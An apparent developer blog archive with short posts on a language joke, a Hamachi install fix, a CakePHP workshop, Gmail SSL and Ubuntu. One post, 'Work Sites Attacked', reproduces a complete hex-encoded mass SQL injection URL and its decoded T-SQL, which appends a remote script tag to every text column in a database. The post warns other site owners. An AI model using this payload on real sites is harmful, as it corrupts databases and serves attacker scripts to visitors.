Repost: If Programming Languages Were Religions

A very funny post for the programming nerds out there:

If programming languages were religions…

By amz - Monday, December 15, 2008 at 14:52

PHP would be Cafeteria Christianity - Fights with Java for the web market. It draws a few concepts from C and Java, but only those that it really likes. Maybe it’s not as coherent as other languages, but at least it leaves you with much more freedom and ostensibly keeps the core idea of the whole thing. Also, the whole concept of “goto hell” was abandoned.

Mantis To Basecamp To-do(s)

I just created a handy little script to create todos in basecamp for unresovled tickets in mantis.

You can see the open sourced code/project: http://code.google.com/p/mantis2basecamp-todo/.

This is something we found useful, if you use both tools, you might find it useful as well.

Hamachi Install Error On Ubuntu - Fixed

I recently re-installed ubuntu (linux) on a server and ran into difficulties installing hamachi.  As it turned out I tried to setup hamachi without installing the tun module first.  I then installed the tun module, but hamachi wouldn’t work.  I eventually figured out that the tuncfg had to be cleaned/make’ed again, after the tun was re-created.

This is the error I was getting:

bash: /sbin/tuncfg: No such file or directory

And this fixed it:

./hamachi-0.9.9.9-20-lnx# cd tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# sudo make clean
rm -f tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# sudo make
cc     tuncfg.c   -o tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# cd ..
./hamachi-0.9.9.9-20-lnx# sudo make install

Copying hamachi into /usr/bin ..
Creating hamachi-init symlink ..
Compiling tuncfg ..
Copying tuncfg into /sbin ..

Hamachi is installed. See README for what to do next.
./hamachi-0.9.9.9-20-lnx# sudo tuncfg

Grand Central - Project Care (phone Numbers For The Homeless)

Pirate Name For “talk Like A Pirate Day”

Source: www.piratename.net

Cakephp Workshop, In Review

workshop, in Raleigh, NC this weekend. Four
of the core developers of the project where there, including the project manger
and the lead developer; along with one of the guys behind jquery-UI. The non-presenters ranged from people who had
never used CakePHP to people who had been using it for a couple of years.

The presentations were fantastic, often just building a
project live, explaining their steps and choices and debugging as they
went. In addition, there was a second
room where the hosts who were not presenting were happy to go over specific
problems, questions, and code, as well as talking about coding approaches or
testing or pretty much anything else.
The one-on-one time was incredibly useful both technically and it was invaluable
to put faces on names.

Since it was just a bunch of geeks, we ended up all going
out to dinner and hanging out in the hotel lobby until 2am, talking about code
and projects and whatever else (HttpSocket).
The Cake guys were very friendly, open, and encouraging – actually liking
some of our work we showed them (at least faking it well). More importantly, they were very quick with suggestions
and information and all sorts of tricks and techniques which would have taken weeks
or months of research to discover on our own.

All in all, the cost was dirt cheap for what we got out of
it and we are very much looking forward to a future “advanced” workshop next
year.

Thanks Guys (and Cindy),

Alan & Corey

Cakephp Workshop 2008.09.06

So here I am, in Raleigh, NC - waiting for the CakePHP Workshop to start… We survived the rain so far, waiting to see if there is any flooding or whatnot.

Have met a few people here so far, all seem very friendly. Looking forward to seeing what happens and what we learn along the way.

I am wearing my “I [heart LAMP” geek-shirt today, as it seemed appropriate (if a little over the top nerdy).

Modern Internet Identity Theft By Andrew Patrick

A recent report
from Don Jackson at SecureWorks (dated March 20 2007) examines a new
Trojan and provides some alarming insights on Internet Identity Theft.
It is worth reviewing this case carefully to understand how
sophisticated modern identity theft schemes have become, and how
difficult it can be to investigate and prevent them.What makes this
Trojan interesting is that it:

• is installed automatically simply by visiting an infected web site
• is invisible to the user
• is often missed by anti-virus software
• is able to steal identity information even if it is encrypted using https
• efficiently collects large amounts of information and sends it to a “mother ship”
• provides an interface for fraudsters to easily purchase the stolen data
• is been used to collect thousands of login credentials at major banks and government agencies
• has not been shut down
• is only one of many such programs that are now offered as kits

source: http://www.andrewpatrick.ca/essays/modern-internet-identity-theft/

his source: http://www.secureworks.com/research/threats/gozi/?threat=gozi

Gmail Users Should Go Ssl

Why You Should Turn Gmail’s SSL Feature On Now

Let’s talk security and why you should take advantage of Gmail’s recent SSL feature, and why you might want to be careful using other non-SSL webmail services.

But first, make sure your connection is secured using SSL.

How do you know a connection is secured by SSL? The handy “s” after “http” will tell you. For example, https://mail.google.com is encrypted while http://mail.google.com is not. You can force an encryption by adding the “s” yourself, or by turning on “Always use https” from the Browser Connection settings of your Gmail account.

It’s not just your email - changing your password gives access to your google docs, analytics, notes, etc… I’ve been forcing https with a firefox plugin for a while - but much better as a gmail setting, since it travels to other computers with me.

Dell Is Now Shipping Computers With Ubuntu Installed

Here’s a list of computers being shipped by Dell with Ubuntu… decent savings, good systems, and pro linux… makes me really happy.

Holy Hand Grenades, Firefox3 + Firebug1.2 = Amazing!

I’ve been putting off upgrading to FF3 because I was afraid of plugins which wouldn’t work and at this point, I live by many of my FF addons.

Well I feel silly now - having updated… Things seem to be as smooth as possible and FF is much more responsive. YAY MOZILLA!

A Wonderful Investigation Into Ubuntu Usability

I think Ubuntu is great, easy to use, standardized, and built on Debian… what could be better? Apparently - there are certainly some things which could be better.

Here is a great experiment one geek and his girlfriend undertook:

Introduction

I’ve toyed with Linux since 2002, when I first installed Mandrake. With the latest release of Ubuntu,
I was interested to see how far Linux had come since then in terms of
being used easily by the mainstream. So, I tricked my grudging
girlfriend Erin into sitting down at a brand new Ubuntu 8.04
installation and performing some basic tasks. It’s surprising how many
seemingly simple things become complicated and even out of reach for
someone without a knowledge of Linux. There are a lot of little things
that could be done to make the experience a lot more friendly for
non-computer-literate people – some of them easy to implement, others
not at all.

Work Sites Attacked

Just an FYI - some of our old sites are not filtering out injection
attacks and got hosed last weekend. The attack seems fairly
sophisticated (imo) and is described in this post.

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000
4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055
00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900
73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069
006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000
62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031
0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00
200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043
0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00
27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C
005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00
6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045
00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000
43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075
00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–

If you just copy the hex value from this URL, as this…

0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680061007200280032003500
3500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C
00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C007300
7900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0078007400790070
0065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F00
7200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062
006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F004300750072007300
6F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020
0042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B0040004300
2B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B0027
0027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F00
31002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062
006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00
43007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200

And convert this to ASCII value, u can convert hex to ASCII

I got this…

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and
a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T’@C
WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’ set
[’+@C+’=rtrim(convert(varchar’['+@C+’))+”<script
src=nihaorr1.com/1.js></script>”’)FETCH NEXT FROM
Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted
using Table Cursors, to each column in the table. If you read the code
you can see how each table in the entire database will be affected from
this.

The source of this came from 219.153.46.28,
28.46.153.219.broad.cq.cq.dynamic.163data.com.cn, the Agent is Indy
Library a CHINESE Bot. The agent Indy Library should be blocked entirly.

our attacks were similar and also coming from [219.153.46.28

——————–

if you’ve got crappy/insecure code out there - be warned